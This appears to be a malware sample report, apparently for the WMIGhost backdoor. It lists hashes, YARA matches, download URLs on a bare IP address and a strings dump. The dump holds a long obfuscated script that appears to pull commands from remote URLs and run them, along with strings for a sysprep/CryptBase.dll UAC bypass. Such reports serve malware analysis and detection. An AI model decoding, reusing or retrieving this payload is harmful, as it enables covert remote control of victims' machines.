Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 6b8ea12d811acf88f94b734bf5cfbfb3 --

Hashes
MD5: 6b8ea12d811acf88f94b734bf5cfbfb3
SHA1: ae93cb98812fa8de21ab8ca21941b01d770272e9
SHA256: 0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
SSDEEP: 768:j5QGuIOFwKTMAj3cdXhwlbapQ8OsHBiR+hYHAGQ:VsIOFwKT/BlbapQH05WQ
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Installer_VISE_Custom_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Installer_VISE_Custom | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/anti_dbg | YRP/win_files_operation |
Sub Files
881fc631cf9e2633b8f42778b5c430dc
Source
http://94.130.104.170/0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
http://94.130.104.170/WMIGhost//0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
http://94.130.104.170/WMIGhost/0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
Strings
		!This program cannot be run in DOS mode.
Rich0x
`.rdata
@.data
t4hdu@
_9= {@
YYh `@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
t.;t$$t(
VC20XC00U
VWuBh4T@
[ShDT@
"WWSh@T@
^VhDT@
PVh@T@
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
WinExec
GetTempPathA
MoveFileA
DeleteFileA
GetTempFileNameA
GetModuleFileNameA
LockResource
SizeofResource
LoadResource
FindResourceA
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetSystemDirectoryA
lstrcatA
GetLastError
KERNEL32.dll
wsprintfA
USER32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
HeapFree
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetCurrentThreadId
TlsSetValue
TlsAlloc
SetLastError
TlsGetValue
HeapDestroy
HeapCreate
VirtualFree
RtlUnwind
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
LoadLibraryA
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
lwzmpvw9|1|5m0boxk9w$;npwt~tmj#bpti|kjvwxmpvwU|o|u$pti|kjvwxm|d8EEEE7EEkvvmEEjl{jzkpimpvw;5k$^|mV{s|zm1w2;#Xzmpo|Jzkpim\o|wmZvwjlt|k;07jixnwpwjmxwz|F10"k7wxt|$;Ikv{|Jzkpim_pwm;5k7jzkpimpw~|w~pw|$;sxoxjzkpim;5k7JzkpimM|am$m2;oxk9jVnw|k$>;2|2;>"oxk9TXPW$
lwzmpvw10b=$mqpj"=7r|`$>N>"=7j_||}Lku$jAtuLku"=7jVnw|k$jVnw|k"=7jAtuLku$>>"=7vQmmi$wluu"=7vJq|uu$wluu"=7vJmk|xt$wluu"=7jQvjmWxt|$wluu"=7jVJM`i|$wluu"=7jTxzX}}k|jj$wluu"=7jLKUIxkxt$wluu"=7o|kjpvw$>+7)7)>"=7klwmpt|$,)))"=7vNTP$wluu"=7Fa$Xzmpo|AV{s|zm"d"TXPW7ikvmvm`i|$bPwpmV{s|zmj#
lwzmpvw10b=7vNTP$^|mV{s|zm1>npwt~tmj#bpti|kjvwxmpvwU|o|u$pti|kjvwxm|d8EEEEEEEE7EEEEkvvmEEEEzpto+>0"=7vJq|uu$w|n9=7Fa1>NJzkpim7Jq|uu>0"=7vJmk|xt$w|n9=7Fa1>X]V][7Jmk|xt>0"=7^|mVJPw
v10"=7^|mTxzX}}k|jj10"=7^|w|kxm|LkuIxkxt10"d5NTP#
lwzmpvw1jhu0bk|mlkw9=7vNTP7\a|zHl|k`1jhu0"d5^|mVJPw
lwzmpvw10boxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FVi|kxmpw~J`jm|t>00"p
18|7xm\w}100boxk9pm|t$|7pm|t10"=7jVJM`i|$pm|t7Zximpvw2pm|t7J|kopz|IxzrTxsvkO|kjpvw"=7jQvjmWxt|$pm|t7ZJWxt|"dd5^|mTxzX}}k|jj#
lwzmpvw10boxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FW|mnvkrX}xim|k9nq|k|9IWI]|opz|P]9upr|9EEE;<IZP<EEE;9xw}9W|mZvww|zmpvwJmxmlj$+>00"p
18|7xm\w}100b=7jTxzX}}k|jj$|7pm|t107TXZX}}k|jj"dd5^|w|kxm|LkuIxkxt#
lwzmpvw10boxk9mpt|$w|n9]xm|10"=7jLKUIxkxt$>zjm`i|$j|ko|k?xlmqwxt|$j|ko|kwxt|?xlmqixjj$j|ko|kixjj?qvjmwxt|$>2=7jQvjmWxt|2>?vjm`i|$>2=7jVJM`i|2>?txzx}}k$>2=7jTxzX}}k|jj2>?vnw|k$>2=7jVnw|k2>?o|kjpvw$>2=7o|kjpvw2>?klwmpt|$>2=7klwmpt|"=7jLKUIxkxt2$>?m$>2mpt|7~|mTpwlm|j102mpt|7~|mJ|zvw}j10"d5Zu|xwV{s|zmj#
lwzmpvw10b=7vJq|uu$wluu"=7vJmk|xt$wluu"oxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FIkvz|jj9nq|k|9Wxt|$EEE;jzkzvwj7|a|EEE;>00"nqpu|18|7xm\w}100b|7pm|t107m|ktpwxm|10"|7tvo|W|am10"dd5]|zv}|#
lwzmpvw1jvlkz|Jmk0boxk9r|`zv}|$jvlkz|Jmk7zqxkZv}|Xm1)0"oxk9jvlkz|$jvlkz|Jmk7jl{jmk1(0"oxk9oxuj$jvlkz|7jiupm1>5>0"oxk9k|jlum$>>"
vk1oxk9p$)"p%oxuj7u|w~mq"p220bk|jlum2$Jmkpw~7
kvtZqxkZv}|1oxujBpDGr|`zv}|0"dk|mlkw9k|jlum"d5zpkzu|]|zv}|#
lwzmpvw1jz0boxk9{xj|$jz7zqxkZv}|Xm1)0"oxk9j${xj|4*+"oxk9k$>>"
vk1oxk9p$("p%jz7u|w~mq"p220boxk9wz$jz7zqxkZv}|Xm1p04j4p2("p
1wz%*+0bwz$(+/21wz4*+0< -"dk2$Jmkpw~7
kvtZqxkZv}|1wz0"dk|mlkw9k"d5TxpwUvvi#
lwzmpvw10b=7vQmmi$w|n9=7Fa1>Tpzkvjv
m7AtuQmmi>0"oxk9
||}LkuXkk`$=7j_||}Lku7jiupm1>">0"oxk9jmxkm$w|n9]xm|10"oxk9vAtu$w|n9Xzmpo|AV{s|zm1>TJATU+7]VT]vzlt|wm7*7)>0"
vk1oxk9w$)"w%
||}LkuXkk`7u|w~mq"w220boxk9LkuUpjm$w|n9Xkkx`10"oxk9LKUwlt$)"mk`boxk9mjmk$
||}LkuXkk`BwD7txmzq1>qmmi#6673&EEEE7iqi>0"p
1mjmk8$wluu0bLkuUpjmBLKUwlt22D$mjmk"d|uj|b=7vQmmi7Vi|w1>^\M>5
||}LkuXkk`BwD5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>Lj|k4X~|wm>5>Tvcpuux6,7)91Npw}vnj"9L"9Npw}vnj9WM9,7("9ko#(7 7(09^|zrv6+)) )/+-9_pk|
va6*7,>0"=7vQmmi7J|w}10"oxk9k|jivwj|$=7vQmmi7K|jivwj|M|am7k|iuxz|161GEEj30e1EEj3=06~5>>0"oxk9k|$6%mpmu|'Y1730Y%EE6mpmu|'26~"oxk9mpmu|Upjm$k|jivwj|7txmzq1k|0"
vk1oxk9p$)"p%mpmu|Upjm7u|w~mq"p220bmk`bvAtu7uvx}ATU1mpmu|UpjmBpD0"oxk9zvwmxpw|k$vAtu7~|m\u|t|wmj[`Mx~Wxt|1>mpmu|>0"oxk9mtijmk$zvwmxpw|kB)D7m|am7txmzq1>Y1730Y>0"LkuUpjmBLKUwlt22D$=7zpkzu|]|zv}|1mtijmkB(D0"dzxmzq1|0bddd
vk1oxk9Lkupw}|a$)"Lkupw}|a%LkuUpjm7u|w~mq"Lkupw}|a220b=7jAtuLku$LkuUpjmBLkupw}|aD"oxk9klwwlt$*/)"nqpu|1klwwlt44')0b=7vQmmi7Vi|w1>IVJM>5=7jAtuLku5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>ZVWM\WM4M@I\>5>xiiupzxmpvw6a4nnn4
vkt4lku|wzv}|}>0"=7vQmmi7J|w}1=7jLKUIxkxt0"oxk9k|jivwj|$=7vQmmi7K|jivwj|M|am7k|iuxz|161GEEj30e1EEj3=06~5>>0"p
1k|jivwj|7u|w~mq')0boxk9zvttxw}j$wluu"oxk9zvwmxpw|k"mk`bvAtu7uvx}ATU1k|jivwj|0"zvwmxpw|k$vAtu7~|m\u|t|wmj[`Mx~Wxt|1>}po>0"
vk1oxk9p$)"p%zvwmxpw|k7u|w~mq"p220bp
1zvwmxpw|kBpD7~|mXmmkp{lm|1>p}>0$$>)x,,+{,x-*,+>0bzvttxw}j$|oxu1>1>2zvwmxpw|kBpD7m|am2>0>07zvttxw}"dddzxmzq1|0bdp
1zvttxw}j8$wluu0boxk9zvttxw}k|jlum$>>"
vk1oxk9p$)"p%zvttxw}j7u|w~mq"p220boxk9k|jlum$>wv9k|jivwj|>"mk`bk|jlum$|oxu1=7]|zv}|1zvttxw}jBpD7oxul|00"dzxmzq1|0bdp
1p')0bzvttxw}k|jlum2$>5>"dzvttxw}k|jlum2$>EE>>2zvttxw}jBpD7p}2>EE>#EE>>2|jzxi|1k|jlum02>EE>>"dp
1zvttxw}k|jlum7u|w~mq')0bzvttxw}k|jlum$>b>2zvttxw}k|jlum2>d>"=7vQmmi7Vi|w1>IVJM>5=7jAtuLku5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>ZVWM\WM4M@I\>5>xiiupzxmpvw6a4nnn4
vkt4lku|wzv}|}>0"=7vQmmi7J|w}1=7jLKUIxkxt2>?zvttxw}$k|jlum?zvttxw}k|jlum$>2zvttxw}k|jlum0"dd|uj|b=7jAtuLku$>>"klwwlt$)"dd=7klwmpt|$1w|n9]xm|1007~|mMpt|104jmxkm7~|mMpt|10"NJzkpim7Ju||i1())))0"dp
1=7jAtuLku7u|w~mq')0bk|mlkw"dddzxmzq1|0bddd5_pk|#
lwzmpvw10b=7PwpmV{s|zmj10"mk`b=7TxpwUvvi10"dzxmzq1|0bd=7Zu|xwV{s|zmj10"dd"w|n9TXPW107_pk|10";"oxk9p$k7IlmF10"k$^|mV{s|zm1w2;#FFPwm|koxuMpt|kPwjmklzmpvw;07jixnwpwjmxwz|F105k7Mpt|kp}$;Ikv{|Jzkpim_pwm;5k7Pwm|koxu[|mn||w\o|wmj$/|*5k7IlmF105k$^|mV{s|zm1w2;#FF\o|wm_pum|k;07jixnwpwjmxwz|F105k7wxt|$;Ikv{|Jzkpim_pwm;5k7Hl|k`$>j|u|zm939
kvt9FFmpt|k|o|wm9nq|k|9mpt|kp}$;Ikv{|Jzkpim_pwm;>5k7Hl|k`Uxw~lx~|$;NHU;"oxk9j$k7IlmF10"k|mlkw9k$^|mV{s|zm1w2;#FF_pum|kMvZvwjlt|k[pw}pw~;07JixnwPwjmxwz|F105k7Zvwjlt|k$p7ixmq5k7_pum|k$j7ixmq5k7IlmF105;;d"|1;}x();5>oxk9jAtuLku$;qmmi#66rltxk!).7{uv~jivm7zvt6
||}j6ivjmj6}|
xlum"qmmi#66rltxk!).7nvk}ik|jj7zvt6
||}6"qmmi#66rltxk!).7upo|svlkwxu7zvt6}xmx6kjj"qmmi#66{uv~j7k|}p
7zvt6rltxk!).6
||}6"qmmi#66rltxk!).7mqvl~qmj7zvt6
||}"qmmi#66rltxk!).7mlt{uk7zvt6kjj";">0"
gupdate.exe
%s\%s\%s%s %s
cmd.exe
%s\%s /c %s
cmd.exe
%s\%s /c %s
IDR_RESOURCE
gupdate.exe
\cmd.exe
IDR_RESOURCE
IDR_RESOURCE
\cmd.exe
%s%s.dll.cab
wusa.exe
/c %s %s /quiet /extract:%s\%s\
sysprep
CryptBase
SysNative
%s\%s\%s%s
%s\%s\%s%s
CryptBase.dll
kp,s{h
CryptBase.dll
85&?)+
!This program cannot be run in DOS mode.
`.rdata
@.data
DeleteFileA
InitializeCriticalSection
DeleteCriticalSection
OutputDebugStringA
LeaveCriticalSection
CloseHandle
SetFileTime
SystemTimeToFileTime
GetSystemTime
WriteFile
SetFilePointer
CreateFileA
GetSystemDirectoryA
EnterCriticalSection
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WaitForSingleObject
CreateProcessA
MoveFileA
GetTempPathA
GetModuleFileNameA
KERNEL32.dll
strlen
strcat
sprintf
_strtime
_vsnprintf
??2@YAPAXI@Z
__CxxFrameHandler
??3@YAXPAX@Z
memset
_beginthread
malloc
strcpy
MSVCRT.dll
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CoInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
GetModuleHandleA
GetStartupInfoA
LocalFree
_CxxThrowException
??1type_info@@UAE@XZ
aaaaaaaa
YYYYYYYYYYYYYYYY
[%s] - %s
\httpcom.log
Script Error
Run OK
create process:%s
process[%s] end
.?AV_com_error@@
.?AVtype_info@@